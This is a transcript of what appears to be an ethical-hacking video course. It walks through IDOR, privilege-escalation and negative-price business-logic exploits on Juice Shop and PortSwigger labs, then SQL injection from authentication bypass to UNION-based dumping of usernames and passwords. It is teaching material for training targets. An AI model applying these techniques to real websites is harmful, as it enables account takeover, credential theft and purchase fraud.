an account so you can actually just come up here click on the account setting the account tab go to login create a login and once you're logged in try and find how you can leave feedback as someone else we are going to go ahead and solve this challenge if at any time you feel like we have gone far enough and you have enough Clues you can pause the video and try and solve it on your own from that point forward but we're going to come over here to this menu we are going to click customer feedback now I want to give you another helpful tip if math is not your strong suit you can actually open up and inspect the element you can come to network and then you can refresh this I'm going to enter Network we will get a whole bunch of get requests and we will look through and find the one since this is called captcha we're going to find the one that is labeled with captcha and in there it will have for us the answer and you see this request we are going to look at the scoreboard at the end of this video and I'll kind of talk through what this is but we're going to go to this as soon as we solve this idor but as we continue scrolling through and we're looking for the capture right here you can go to the response our answer is going to be 11. so it will solve for you whatever math problem you have and that's the easiest way to get through these and so our answer is going to be 11. it has our user name we can leave a comment I like to just sleep hello world we would give it a rating and then make sure to intercept when you submit this and so we'll hit submit and now we have our user ID if you want you can go ahead and pause the video and see if you can figure out what to do from here what we will do is we're going to send this to the repeater we can come up here open it up we can send this request to make sure it goes through it says it was created so we have successfully left feedback but we want to leave feedback as someone else and so what we do is we can change our ID to let's just go 14. just pick an arbitrary number that's less than the one we were using or the one we were assigned and then we can send it and it says it was created so now we should be able to turn off our proxy intercept come back to our web application and it tells us we successfully solved the challenge of forging feedback so this is an example of an idore where we are leaving feedback under some other user's name and now I want to go to the scoreboard real quick this is where you can see the challenges and you can see all of the challenges that are available on this web application all right um I was playing around with the comment section in the products and I realized you can actually leave feedback as someone else other than coming over here to our customer feedback you can actually lead feedback from a different user right here on these products and maybe you actually figured that out in the last one and if you did that's awesome and if not you can go ahead and try and solve this Challenge on your own and then we will go through it together so if you want to give that a shot you can go ahead and do that now okay we're going to just open up one of the items that already has a review so that we have a name that we can leave feedback under and what we'll do is come over and turn on our intercept and type in some kind of message and then we will submit we'll come over here and see if we can find it and here it is we can send this to our repeater you can come over here and send this and it says it was created so we have the message and then we have the author so instead of having our name in here we can put in Bender at Juice Shop I was at Dash I think that is how it was written and then we should be able to ascend this and we'll actually just put in something else here and send it and it says it was created we'll Turn The Intercept off and you can see here it was it was created under someone else's name it actually says we have successfully completed the challenge again okay our next challenge is going to be one that we have talked about but we have not actually seen and I have not come across any vulnerable web apps to actually test this on and show it to you but we have talked about it and you might have to use some of your Googling skills or just if you get stuck follow along with the video and get a hint before you move on but we're going to create an admin account and this is something that is very possible that you will come across it's not very common but it does happen that you can find ways to create an admin account or escalate your privileges so we're going to go ahead and make sure our intercept is off and what I need you to do is go ahead and create an account and see if you can figure out how to get the account enrolled as an admin and so you can go ahead and try that now I think what I will have to do is log out and I'm going to make a new account just the same and I will come in here and go not yet a customer this time we'll go John at John .com and as soon as you get this done we will turn on our intercept and we will register the account now what we're going to do here is we're going to send this to repeater and over here is where we'll work on escalating the Privileges to an admin so we'll send this and just to get a response to see what we have here so our role is a customer and this tells us that we're going to need to change the role and so I actually just did this a few hours ago I was just working through the application and I'm going to show you exactly what happened to me because this will give you a really good idea of just the trial and error that we go through when we're testing application so I came in here I typed in roll just like this and I typed in admin and if you send it since this user has already been created over here we're actually going to have to change this to one and if we send it we can see we've now created another user but the role is still customer and so I change this to administrator and it still didn't work so I tried to change this to user admin and then change this over here again and we are still a customer and I've tried user I tried admin I tried administrator and finally what happened was I deleted this and I came up here and I tried to just move our input to see if that would make a difference and I typed in admin just the same as before and that looks good and we'll change this to a 3 and then we will send it and now you can see our role is now admin so we have created a an admin user so if you take this user with this password that you just made you can log in and browse The Juice Shop application as an admin and so you'll actually see things like this in the wild they're uncommon you can actually go on hacker one and read the activity and see where people have actually got this to work and you can see um just read the articles and read the submissions to observe how people have pulled this off some of them are going to be more complicated this than this but some of them really will be this simple okay what I need you guys to do for this next lesson is go ahead and open up a new tab and up here we're going to go to Port Swicker and you can go ahead and search for it it should be the first one and we're going to open it up and we're going to move over to the login button I've already created an account and so go ahead click on login create an account we're going to need it especially in the coming lesson so go ahead click the login button make an account and I'll see you once you're logged in okay once you have reached your login page go ahead and click on Academy and then go to all labs and once this loads we're going to go ahead and scroll down until you find business logic and I believe it's pretty far down in all of these labs and so scroll down to our business logic errors vulnerabilities right here and we're going to be working through these right here and so let's continue going forward so these actually say sold because I already made the videos for these and I realized that I never actually explained uh how you guys should get here and get to these Labs before I started filming these videos so I'm going to edit the video and these are going to turn into unsolved okay we are going to look at a few business logic vulnerabilities and so these are very similar to the eye doors that we have been looking at and so we're going to go ahead and start here with this one right at the top so you can go ahead and click on it and we can look and see what exactly they have for us and it says that it doesn't validate user input and we're to buy this lightweight jacket so you can go ahead and open up the lab and this is where it brings us it said we needed to log in so we will go ahead and do that and it gave us the login credentials so we'll log in and now we're supposed to buy this jacket so I guess we can go ahead and view the details and add it to the cart let's actually uh come in here Turn The Intercept on we'll add it to the cart and it tells us our price right here I don't know exactly how much we're allowed to spend but I think we should be able to let's see if we can make this a negative number and we'll go ahead and forward that and then we'll just turn that off and it did not add it to our cart we have a hundred dollars to spend on this jacket and this jacket is way over a hundred dollars thirteen hundred dollars so we'll go ahead and see if we can um Turn The Intercept on add this to cart and let's just uh change our price here and see if that works okay we were allowed to add it to our cart so we have no need to apply a coupon and we should be able to place our order and it says we have solved the challenge so things like this and biznic logic errors eye doors and business logic errors they're going they're going to be things that you have the opportunity to find these are pretty common that you'll find these business logic vulnerabilities they happen when developers get lazy or they're just not really paying attention to what they're doing I've actually seen really Advanced developers make very simple mistakes that made their web applications vulnerable just because they weren't paying attention and so you can find these they're pretty common I know there's at least one bug bounty hunter that this is all they do they look through burp or they look for business logic errors and what they can change just to find stuff that they shouldn't be able to and vulnerabilities these are pretty simple and they do take a long time to find but you can find them just by doing really simple things by just changing numbers and inputs sometimes you will find stuff that has been encoded it'll say like you'd have the lightweight jacket let's actually go back I'll just show you sometimes we will add things to our cart like this and you would have this it'd say price and it would look like this instead we'll encode it base64. you'd have this sitting inside your price instead of that number and so what you have to do if you see something like this you'd have to take this and you'd come to your decoder or you can go to cyber chef and you can put it in and try and decode the price rarely going to see it where it's just a plain number but this is way more common that you would just see a number here and that you would have to decode it sometimes these prices will be stored in places other than just something plain and simple like this and so it's something that you're going to have to look for and poke around they do take a while to find but you can find them right off as a beginner who knows very little and we're going to look at one more and then I want to send you off on a challenge and see if you can find a business logic error on your own okay we are going going to continue with the business logic vulnerabilities we're going to go ahead and open up this second one and after this one I'm going to set you loose on a challenge so what we'll do is we'll go ahead and open this up it looks like the same as the one before we need to buy this jacket and we have our login user right here so we'll go ahead and log in and we'll try and proceed with buying the jacket okay here's our jacket so we'll go ahead and view details We'll add it to the cart we're going to do the exact same thing we did in the last one and I'm going to do it the exact same way by starting out oh we don't have a price so we got our product ID our product and here's our value let's get two of them and I'm assuming we have the same amount of money in us our in our card as we had the last time to spend so we'll go ahead and just put the negative sign in front of the two and we'll see if it allows us to put in a negative number and we were so in our cart if we go look at it it says we have negative twenty six hundred dollars that means they are going to pay us see if it'll go down by using these buttons it does so you wouldn't even have had to have done this in burp you could have just come over here and click this button and it means they're going to pay us this amount of money so when we place our order we're definitely going to be able to buy our jacket and our store credit is going to increase our price is not allowed to be less than zero at least they have that in in place so we'll go ahead and okay made our car empty we're gonna have to go back and put that back in our cart so what I think we'll do is we'll add this to our cart as well I'm not sure how many of these we're going to have to add we'll go ahead and add one in so that way we can buy our jacket because that is our challenge we'll go ahead and make sure that's negative forward turn that off and now we should have two negative items in our cart it has to be above zero but less than a hundred so what we can do is we can just continue to subtract these oh we'll add these we'll go ahead and add these until we hit our price okay it went back to zero and removed it from our cart so we'll go back over here back over here let's find something a little more expensive so we don't have to add that so many times we'll go with the pool come to burp turn our intercept on and this is exactly how this would happen if you were testing it it's just going to be a lot of trial and error we're going to need I might guess at least 15 to 15 of these we'll just go ahead and add them to the cart we don't need to intercept that and go back to our cart and there our total is now 76 dollars so what we did is we just added 15 of these pools which Got Us close to fifteen hundred dollars and then we or yeah 1500 and what we did is we went ahead and added our jacket in at a negative price because it wouldn't let us purchase anything at a negative number and we only have a hundred dollars to spend and so this should solve the challenge this time so we'll go ahead and place our order so I just wanted to add that you saw me make a lot of mistakes and a lot of trial and error in this video and I want to thank you for being patient but I also decided not to edit out all the clicking that I had to do and the failures from this video because I wanted you to see what it's realistically like as you test web applications and as you're on the hunt you will be doing what I just did the majority of your time just trying to see if things work and as they fail you just go on and you try something new and you try a different way to try and exploit the application or the vulnerability and so I want to just encourage you that as you become frustrated or things aren't working to just keep pushing on and see if you can find that vulnerability okay it is time for your challenge so if you navigate over to juice shop and get it running well what I want you to do is try and solve the challenge to where you actually are getting paid two or three or four hundred dollars or more from this application we just worked through two Labs that are similar to this so you can go ahead and try and solve this Challenge and when it's done you should get the green bar at the top of your screen it'll tell you that you have completed the challenge so I want you to go ahead and pause this video and give that a try okay how did that go we're going to go ahead and walk through this in the same manner in which I would solve this so go ahead and add something to your basket and then we'll check our basket and then at this point what I would do is I'd go ahead and turn the intercept on and walk through the whole checkout process and see if there's anywhere that I am able to modify and see if I can modify this in any way shape or form and what I think I'm going to do is I don't actually want to walk through and have you watch me put all that information in just to solve this challenge so we'll go ahead and see if we can actually modify this before we get there so it says we have basket idea five we're buying product number four let's see if it will let us do what we did in the previous Challenge and put in a negative amount let's try 99 Turn The Intercept off it says we were able to add those to our to our basket and they're going to pay us ah that didn't work okay they're gonna pay us if we do that so we'll go ahead and we'll try that again 100 wasn't enough so we'll come back to our products We'll add to our basket I forgot to turn burp on we'll add this to our basket pull forward forward here's our quantity I wonder if the rest of our contents at the end of this string well we have our quantity so what we'll do is we'll type in negative and we'll do 200 this time and we'll forward that and go to our basket and that's more like it we're going to get paid 400 so what you do at this point so for the next few minutes I'm going to show you a little bit of a walk through and explain SQL injection from the notice website and I don't want you to actually go there or try and do this walkthrough we're going to have plenty of practice when I have you create account with port swiger and we walk through the portswicker SQL injection labs and so for just the next few minutes as we go through the notice example I'm and then I'm going to show you what the code actually looks like in a mySQL database and I actually wrote a react app that's hooked up to a node.js backend with mySQL as the database so you can kind of see what the code looks like not that you need to memorize it but it might help a little bit then we are going to move from there into a port swigger and try to walk through the SQL injections together so for the next few minutes as I am on the notice website just try and follow along and maybe catch a few nuggets of detail to understand and then as I walk you through the actual back end of a SQL database I hope that you can understand it and maybe even do a few of the port swiger walkthroughs with me and then come back and then watch the mySQL database explanation again and hopefully it will begin to click this is one of those attacks that is really really common and so it's something that you should know and up front I'm just going to tell you it might take you watching this and going through these Labs several times to fully grasp the SQL injection but that's okay it takes time to become an ethical hacker so with that let's jump into it okay we are going to begin working through some SQL injection this is something that you can find there are bug bounty hunters that dedicate their time only to looking for SQL injections so this is something that you find interesting you can become really proficient at it and this can be something that you primarily search for so this is something I suggest learning and learning well it's easy to look for you don't really need to know a whole lot about SQL databases in order to find these but it does help in the bug Bounty world it's actually a lot easier than if you find these on a capture the flag because all you have to do is put in a time delay to prove to have a proof of concept but in a capture the flag you'll have to know a little more than what we're going to go over here but for the sake of not going through and learning how to program in SQL databases that I think it would take just too much time and so we're going to go through how to find these if you were to start looking on bug Bounty programs and I went ahead and opened up notice 15. you don't have to go through this or work through this I'm only going through this to show you what it's going to look like and then we're going to actually go go over to port swiger and we're going to work through their practice SQL injections and so just to give you an idea of what we're doing when you come to a login form such as this one it's one of the best things you should do and you should regularly check for is just to put in a single quote and then you would hit enter and see what happens and it says this user does not exist what we're looking for is an error in the query so I would go and I would do a double quote next and I would hit check existence and if you can hit an error this is what we're looking for and I'll actually show you and Bert because this is where you're probably going to be sending your request through so you'll hit check existence you would send this to your repeater and I'm actually just going to go ahead and change this so you can see it and then you would hit send and it says we get an error in query what we're going to see here in a little bit is we're going to see this be a 501 and internal service network error and that's usually what you'll see start finding these but you will find what is called a blind SQL injection we're going to look at those a little bit later so we still have the error so what do we do with the error is we're going to start the enumeration process but we're actually not going to do that here I just wanted to show you kind of what we're looking for here so that you can look for it on your own in the first portswicker lab and see what you can find if you can find it on your own but just to give you a little more of an idea of what's going on in the background the SQL database and the SQL language is going to look something like this select all from users this will be where username equals and this is what we input right here so this would be our input so what we did is we took this this is what it'll look like and this is what we can put in here so you'd put your single quote or your double quote and in the case of the notice web application what it has is a something like this and then here's where you're putting your query where you're putting in to see if the username exists and so when we put in another double quote what happens is you break the query and this produces the error right here because it doesn't need to be there it shouldn't be there in order for this to work in programming and so that's how you break it okay what we're about to go over is going to be a little Advanced but I think it will help you visualize what's going on Beyond more than what I just showed you in the last video so what I have up is actually MySQL workbench we have here just a simple database username I was testing here's an actual username and password this is what a table will look like and so in our query we have select all from users which is our schema and then the table which is users that's not capitalized letter here and so this is what a table looks like and what's going to happen is this is running on a server and when we send a query to the back end of a web application it will reach out to the server and see if our query is true so I want to pause here because so this is an update I want to pause here and explain something a little better that I noticed I didn't do a very good job of when you make a query to a database the whole reason I wanted to show you the workbench is so that you could see these are the tables so if I came over here and I said from select all from blog post then we're going to be grabbing the tables from inside the blog post and so when we look at this select all from users this is showing all the databases so this is a database this is a database and we're selecting from this database right here the users table so the first one that we see right here this is the database and this is the table within the database so select all from a database and then a table this will be really helpful in the future when we learn to run SQL map and we need to know the context of SQL map and so this is what it will look like the code will look like we have our database and we're querying our database and we are selecting all from the users table where the username equals and then you can just pretend this is blank because this is where our input is going to go in here so we're selecting all users from the table where our input is at and the password is equal to the other input and so this makes sure that we have an actual username and then it makes sure we have a password that matches our username and our password from our table and so what this looks like is over here we have have our login here and if we type something in and we type in a password and we hit log in it's going to say wrong username slash password and so if we come in here and we actually have our actual login made it'll say we are logged in and so when we do a SQL injection basically what we're doing is sending in a request that we decide what it's going to be to the database or the back end of the website it reaches out to our database server so this is a pretty simple SQL injection that we're going to be covering here and we're going to be going into Union select statements after this video which I think are more common than what we're about to go over and so it's very important to learn the union select SQL injection statements there are some bug bounty hunters that dedicate all of their time only to SQL injection so I just made this I'm shooting this video because I really want you to understand what's going on and it'll make more sense don't worry if it doesn't make sense right now you may have to come back to this video more than once and go over the union select statements Labs on your own and then come back to them after a day or two and just continue practicing them until you really have them down and so one of the things that we're looking for when we do a SQL injection is I'm going to inspect this so you can actually see this happen we're going to have our console up ignore my errors because my code is not perfect when you put in a single quote it will break this right here and it will give it will crash our server so if we go ahead and throw that in you see our connection is refused and if you come over here you can see our application has crashed which means I need to restart it and now our applications are running and so when you send that you'll have an internal server error which is what we essentially just got right here and so how we get past this is by actually giving it a statement that is true so that it will give us back the first character the first login in the database it'll give us back the first username and password and so we're going to make a true statement right now and so what we'll do is we'll just throw in it doesn't really matter and then our single quote and then we'll have or one equals one and then we comment out everything after that and then our password doesn't matter either and it says we're logged in but if we just have this right here it doesn't really it'll tell us that we're not logged in because this isn't correct so if we have this in here what we're saying is is this username right is this a true username and the answer is no you see we have wrong user a username and password but one equals 1 is always true and then we comment everything out after this statement with this hash so our password doesn't work so you see how this is all in one line of code this is all getting ran together it's making this query all together and what we're doing is essentially commenting out everything after our username so the password doesn't even matter so when I say we comment something out we're commenting out everything after our statement and so we throw this hash in here and everything after it's coming out the password it doesn't matter I think we can get by with no password because I don't have it set up right now that you have to have any characters in here and it will come back as true and this is what what I'm talking about when we say sequence statement and we're querying a database or a server okay there is one other thing I really want to show us we're going to go over this again exactly what I'm showing you right now in another couple of videos but I think it'll be helpful to see it so one other thing is whenever you give it a database a true statement it's going to come back with without an error or saying it's a logged in it's going to come back as true so we just saw the statement that looked like this we had our username and then we had or one equals one and one equals one is always true and so it comes back as logged in or it comes back as true there are other things we can do to get get information from a database see we want these username and passwords and we have an ID so we have three columns here that have information in them let's say we know the table is users and we want to know how many columns we have what we'll do is to pull down something true if we want to pull down the number of columns because we don't actually know how many there are and we want to just find out some information from this database you can actually come in here just like we did before put in our random username it doesn't really matter and then this is what I mean when I say a union select statement so we're going to connect Union to our statement here so we have select all from users where username equals these things and then we're going to add to it we want to add a union select I can spell we're going to select null and this will tell us is there one column in our table and we send this we're going to crash the server I'll go ahead and send it so you can see we crashed the server I have to come over here restart the server and then I'm just going to give you there's three columns we know there are three columns so we'll throw in null two more times and this will say Union select null null null which is going to pull down how many columns there are and if we send this we have we didn't we gotten crashed the server because we didn't comment out the rest of the string that we were creating so here we go we'll log in now we have no undefined came back which means we have no errors so we'd know there are three columns and so this is going to come up in one of our very first SQL injections that we're going to be doing on the port swiger web application and they're Labs that they have set up for us to practice on and you feel free to continue practicing in there but this is something we're going to be doing and we're going to be going in a lot more detail and you'll have to pay attention to this comment because it will change between two dashes without the semicolon based on the type of database that we're using so I do apologize if this seems confusing hopefully it becomes more clear it's in the top 10 most common vulnerabilities I think it's in the top five most common vulnerabilities looking a little difficult right now because you've never seen it before but by the end of this module in the course if it's still unclear you can go back and try it again and go back through this module and it will become more clear and you will memorize how to find these vulnerabilities so with that I will see you in the next video okay we are here on portswiger.net you can go ahead I actually went ahead and logged in and created a new account you can come in here and you can come up here click sign in and then create a new account and then once you've done that come back to the website and you will go to Academy you can go ahead and click that and it'll load up and then you'll go to all Labs will take us to some of the labs we're going to be working through and the SQL injection if you are having a hard time finding this exact URL right here I will put a link to it in the description or you can just type this out in order to get to all the labs there's a whole bunch of them we're not going to be going through all of them because some of them get kind of repetitive and it has been a while since I have done these at least a year and so I actually thought what would be good I'm not going to re-hash any of these before we go through them so you are going to see me make mistakes and you'll get to see my thought process and you'll kind of just get to see how I work through these and so if you want you can go ahead and open up the first one and then I like to open it up in a second tab over here and they'll give you some instructions and kind of tell you what you're looking for here they'll actually tell you where to find some of the SQL injections so you don't have to spend your time clicking through the whole web application and trying to figure out where things are and so they kind of point you in the right direction and so we're looking for a SQL injection with the Union attack and so what this looks like let's uh open this back up so this is what their side of the query looks like and then we will be typing in you'd close close it off in our case it's going to be a single quote Union select and then we're going to be looking for the number of columns and what we can find within this vulnerability so we come over here and it says find the number of columns returned by the query and there's a couple of ways to do this I think I'll show you both I think they both work in this program and you can decide what works best for you so you can come in here and I actually want to First give you a chance I'll show you kind of what we're looking for and see if you can find it on your own so you can come in here send one of these to your repeater and see if you can find the SQL injection without any help and uh it's okay if you haven't we really haven't covered this a whole lot but in the coming videos um we'll be able to do this multiple times over and over and so you'll get the hang of what we're going through and what we're looking for okay I'm going to send this to the repeater I'm not actually sure where the SQL injection is even at um I think it we'll try right here okay that's what we're looking for it is going to be right here and so we're looking for this right here this is what I was talking about in the last video the internal server error if you can produce this error what you should immediately be thinking is there's going to be a SQL injection here somewhere it is here somewhere you just have to figure out how to exploit it challenge actually tells us to do is we're looking for the number of columns returned and so we're trying to figure out how many columns are on the specific table and so if you think of an Excel spreadsheet you have rows and then you have columns and what we're trying to do is figure out how many columns exist on the table and when you're doing a SQL injection we're going to be looking for passwords as we go through the poor swigger program but there are a lot of other things you can look for and we're going to get to those and exactly how to find them even though you're never really going to pull down actual information on a bug Bounty program I wanted to walk through as someone who doesn't know how to program in SQL what to do if you come across a capture the flag and you're trying to find specific things such as usernames or Flags or passwords and so we'll get to that in the coming videos but now we have produced this internal server error and so we know we are looking for the number of columns using the union and attack so we have our single quote which breaks the query and then we type in Union and because we are sending this request we have to send a plus for the space if you don't have the Plus in there or and you actually put a space in it will break what we're trying to send so Union select and then you put in here null which is just nothing and then you send it and it comes back with nothing and then you just hit comma and then you would put in null and you'd send it and it still sends us an error so we put in null again and we send it and oh you know we forgot to do was you have to close out the rest of the query so in here we have to put a dash dash so that comments out everything after our statement here so and then we'd come over here and we'd put in null again and it still says we have found the number of columns and so it hit on the number three it came back okay so this statement would be true so when the statement is true it'll send us back a response and so we have our response which means there are one two three columns inside this lab we're working on and so as we come into the next one we'll read the instructions and we'll work through it what I would like for you to do is go ahead and open up the second lab and click access to the lab and I want you to go in here and do exactly what we did last time and see if you can remember how to find the number of columns in a SQL table so you can go ahead you can open that up see if you can find it and then if you want to try and figure out how to find the columns containing text you can Google around and see if you can figure it out if not we're going to work through it now and you will have the opportunity to practice finding columns containing text as well as continuing to find the number of columns in a table in the future so this isn't your only chance to try and practice this on your own okay if you were able to pull down the number of columns then you have figured out or learned what we went through in the last lesson but if not we're going to go ahead and work through this one again so we'll come in here click on one of these tabs and we'll have a request sent a get request and then we will take it and send it to repeater see if we can find a an internal server error might not actually be in this one there it is it's in this one so we'll send this to repeater and put in our single quote there is the error so this is where our injection is going to be and so if you weren't able to find it you can go ahead and from here and see if you can solve the challenge and pull down the number of columns in this lab so you can go ahead and give that a try now what we do here if you remember is we type in Union and our plus then we select and then we have our Plus and then we type in our first null value for the column and then we comment everything else out after the request is sent and it says we still have an error and so we try this in you actually don't have to have these in all caps it's just kind of common practice for what people usually do is have things in all caps I'm not really even sure why so if you know why you can go ahead and let me know so we found we pulled this down we found one two three columns and so if you made it this far good job congratulations you have learned how to pull down the number of columns but now we're supposed to pull down on which column has text or which ones take text and so you would put in your single quotes and then you put in a string and then send it and that one came back as an error so we'll try the next column and it is the second column contains text and we'll go ahead and try the final column as well whoops okay so it would be the center column is the one we would go after to try and pull down information which is not actually available in this lab but it is going to be available in the coming Labs so in the next Lab I want you to try and go through this find the category of where you're going to find your error and then try and pull down Union select the number of columns which column contains text and then we'll work through how to actually pull down the information from that column all right I did not notice after I had closed the video that the lab still said it was unsolved and for those of you that is bothered when a lab goes unsolved where you want to see them all solved I'm going to go ahead and do that now so we'll go ahead and I'll show you where to find that if you want you can go ahead and try and find find it I actually think this is a good challenge I think you'll be able to find it just go ahead and go into perform the SQL injection find the one that contains the a string and then look through the response and read through it and see if you can find the answer to solve the challenge this here solves the challenge for you so now the challenge is solved and I will see you in the next lesson okay we are back with the third SQL injection challenge you can go ahead and click on it and read through the prompt I'm actually going to give you the challenge to see if you can pull down which column or columns contain characters and we'll accept a string and then I'm going to walk you through pulling down data from the table and then I would suggest practicing so after we go through it on this lab to try and go through it again without the video before you move on to the next lesson so that you can continue practicing things as you see it happening so we'll go ahead and enter into the lab and it's going to be pretty much the same so if you want to go ahead now I'm going to wait a few seconds and you can pause the video and see if you can complete the challenge and pull down which column or columns contain a string before we go ahead and continue learning how to enumerate the table columns so by now this should be pretty familiar to you we're going to come in here we're going to look for our request that I apparently passed we'll send this to repeater we'll make sure that we get our internal server error and then we'll try our Union select attack and send it and see how many columns we pull down so there's only two in this lab so what we'll do now is we're going to pull down information from the table so I'm going to show you how to do that then I'm going to give a an explanation of the best way if you don't know any SQL or you don't know how to write any SQL statements how to find table names if you find this in a capture the flag and you don't want to go through the long process of trying to figure out the table names through writing SQL statements but before we get there I'm going to show you this is what we'll what we'll do we have two columns you'll see check to see if they'll accept a string and that one does I'm gonna go ahead and leave it and that one does as well that means there's both these columns have information within them and let's say there was a third column if we were to write our SQL statement we would have to include all three columns because the query has to be considered true you would just leave the the null statement in here and we're going to see some of these in the coming videos and just to give you an idea that you can go ahead and try and do these you do null Plus the username see this is what you have to do leave this as an empty column but in our case we don't have three columns so we're going to just go with the ones that we do have and the ones that will accept a string and so we're going to pull down usernames and then we're also going to look for the passwords in the table so we look for the password and this should pull down for us the username and the password from the users table and see this looks like a user this looks like a password this looks like a user this looks like a password and this would be the administrator this would be his password so in a response we have pulled down the usernames and the passwords that are within the table and this would give us access if we wanted to you could log in as these people if this was a real website you would have access to their accounts you can go ahead and turn your proxy off so that the web page loads and then you will have the usernames here and the passwords and you can come over to login and you can give them a try and see if you're able to log in and see if this solves the challenge there that one solved the challenge for us so with that I want you to go ahead and see if you can figure out the next challenge without any help see how far you can get and if you can make it through we're going to skip over this fourth lesson and we're going to jump into the fifth lesson and you can go ahead and open this up and read through it this time we're going to be in an Oracle database and so we're going to be trying to pull down the version that it is running and so with this tip we can see there's a built-in table called dual so they actually give us the table name this time for us to run through and I think with what you've learned so far and the SQL injection cheat sheet you should be able to figure out how to solve this challenge so if you want to go ahead and pause the video now and try you can go ahead and do that if not we're going to walk through the solution together so we'll open up the page we'll go ahead and turn our proxy on and this should all be familiar to you by now so we're sending that to repeater we make sure that we get our internal internal server error and then we move on just like we have before so we type in Union select and then we'll check for a single column but if you remember the table name we were told is called dual and so we can send that and we still have an error so let's try for a second column and we see that there are two tables or two columns and the table name of dual so we'll come in here and make sure they receive they can receive a string and they can so what we'll do now is we're looking for if you remember the version name we're trying to pull down the version name inside the response so we'll come back to a burp and since these can receive string we type in here banner and then if you remember from the previous lesson if we have multiple columns they can receive a string and we're not actually going to use one we have to leave it with null so that way that column receives an input we just don't want anything from it yet at this point and then for Oracle the way you pull down a version is V dollar sign and then just the word version we'll see if that sends it for us I saw this change in the background to solve so that gets us our information that we need and so we should be able to scroll through here and we find it right right in here okay in this lesson we're going to go ahead and open up this one the MySQL and Microsoft I will just go ahead and tell you they are trying to pull a quick one on us because instead of using the typical dash dash right here that we use in Microsoft to close out or to cancel or to comment out everything after your query you use you will use a hashtag and that will snout me I will come across that and I can sometimes not figure out what's going on and I can spend a significant amount of time trying to figure it out and in the end I was using the wrong comment and so it's one thing to be aware of and in this lab we're going to inject an attack we're going to pull down the type of type and version of MySQL that's being used and so this is very very similar to the last one and when you go ahead and open up the lab we are looking to make the database retrieve the string so I'm actually not entirely sure how to get this to say solved so we're going to be figuring this out together for I guess the first time so I'm guessing what we're supposed to do is use our Union select attack pull down the response that we get right here and try and find the version which will look something like this that it's using and then go back and put it into a string and it should give us the solved problem solved up here so if you would like to go ahead and give this a try on your own you can go ahead and do that and I'll give you a few seconds and you can pause the video and then we'll walk through it together we're going to continue the same way we have been turn on the proxy pick a category send it to repeater turn the proxy off I'm going to lower this so when it comes through a solid we can see it we'll see if we get our error and we do try it for null and then don't forget the way we comment out is with the hash or the pound symbol has more than one column and it has two columns so what we will do is we will make sure they can both receive a string and they do and so the way we pull down the version in Microsoft MySQL is a little different than the way we did it with the Oracle one we'll go with the two at symbols you type in version and if you looked through the cheat sheet you would know this is how you pull down the version for Microsoft and so what we do is we type in null because you have to have both columns filled and then we'll send it we came back with a positive response and so we'll look and see if we can oh it solved it for us it already said solved I thought we were going to have to find a version number and send it through as a string right here okay at this point things are going to become progressively more difficult in pulling down usernames and passwords especially once we get to the blind find SQL injection because this is something that we have not seen before so we're going to be preparing for that by going into this lab right here you can go ahead and open it up and we are going to be pulling down the username and passwords and we're going to log in as the administrator to solve this challenge I think you can go ahead if you want and practice pulling down how many columns there are and which ones actually receive a string and you can go ahead and pause and do that if you would like if not we're going to go ahead and solve it together so we'll turn on the Interceptor and we're going to be seeing some new information that we haven't seen before it's going to seem strange but I'm going to do my best to explain exactly how the SQL statements work default tables and what we're looking for so we'll go ahead send that to repeater turn that off send that let's make sure we get our error determine how many columns there are string and they do so at this point things are going to be a little bit different than what we've been doing we're actually going to be trying to pull down some information from these tables and so what we do the first thing we have to do is figure out the table name so if we have a grid like an Excel sheet you have your columns that are going up and down your rows that are going across and the name of the table the first thing we have to know is the table name in order to request the columns and then individual cells within the table for us to pull down they contain the usernames and the passwords so we have our Union select and then we come in and we type in table name and so this is what we're looking for if you remember we're replacing one of the null values with the table name then we leave the second one with the null value because we're not going to be pulling anything from it just yet and then we go from the information schema and this right here the information schema dot tables and this is a default table that you're going to have on every SQL database so that's how I know this is there if you were to go into SQL and you were to open it up you're going to have several default tables the information schema tables this is default it's always going to be there and so this is how we know what to put in for our injection then we send it and we have an error which means I'm guessing I have a typo schema there was my typo and we pulled down and we'll look through our response and see the pull down the table names that we have here and there are a bunch of table names but if you remember the one we're looking for we're trying to log in as the administrator so we're going to need the users table right here users this is the name of users table I would suggest copying it and having a text file open because we're going to need this information so now we're going to look for the column name so we can delete this so the table column is what we're looking for now so we're going to actually I deleted the wrong part of the request set of the table we're looking for the column name and we're going to leave this and the information schema Dot columns and this looks right and now we're going to add to this because now we're looking for the columns from a very specific table so now we add a plus and we'll say where the table name equals and then our users table that we just pulled down so we'll type in table name and then we do equals and then our double quotes I think I've actually already got that copied still and then we paste in our users table so what we have going on is our Union select so everything that's coming before this doesn't really matter we're adding a query onto it we're looking for the column name we have our second value retrieving null because we're not looking for anything from it just yet from the information schema which is one of the defaults within the SQL database and where we found the table so now we're looking for columns where the table name so we're pulling down the table name equals users this is going to give us the columns within the table that is named users with some random characters and so we should be able to send this so now we should be able to scroll down and we have column names so the passwords column and the users column and so now we should be able to change our query and pull down the passwords and the username so I'm going to go ahead and copy these we have the username and the password columns these are the ones that we are interested in and now we're going to change our Union statement so now instead of pulling down a column name we are going to be looking for the username and the password so we can delete our null and we can insert the password column and here we'll put in the username column in the first slot instead of the column name and we're looking for the username the password from users let's see if that works for us and it does so we should be able to come through now to solve the challenge we have the administrator and another user so we can copy the administrator we can come back to our lab remember to solve it we have to log in as the administrator we can paste in the administrator and then we can come back to burp and copy our password and this should solve the challenge for us okay now that was very I don't want to say complicated but it was a big jump from where we have been coming and where we've been coming from and so as we get ready to go into blind SQL injections it's going to become even more complicated so you might have to go through this lab several times and make sure that you really understand what's happening make sure that everything that's built up to this point is working together the next Lab I believe is an oracle lab okay so you can try and solve this one it's going to be similar to the one that we just did only can use the SQL cheat sheet we'll go ahead and walk through it again just so we can have one more practice before we get into the blind SQL injections because these are going to use everything we just learned in this lesson plus quite a bit more we're going to be looking at new aspects within burp and exactly how to use the Intruder tool within the program so I think it's very important at this point if I can stress it enough we're going to have quite a bit of practice going into the blind SQL injection but it's a lot more difficult than what we just went through if you've never done this before so go through this again if you have to make sure you understand what's happening and what's going on I want you to try and solve this lab completely on your own I'm going to give you two Clues before you start but other than that you have already learned everything necessary for solving this challenge we'll go ahead and open up the lab and if you remember when we you do go through an Oracle database you have to use from Dual when you're trying to pull down the number of columns when it within the table and so since we're looking for for the we're going to have to log in as the administrator that should give you a clue to at least how many columns are going to be within the table and so the other clue I wanted to give you is if you go ahead and open up the SQL injection cheat sheet when you pull this open you are going to be using from all tables instead of information schema so in the last lesson we used information schema as our default well that's not what we're going to be using this time this time we're going to use all tables everything should be the same as it was last time the only difference is we're going to be using all tables instead of information schema and so you can go ahead with that 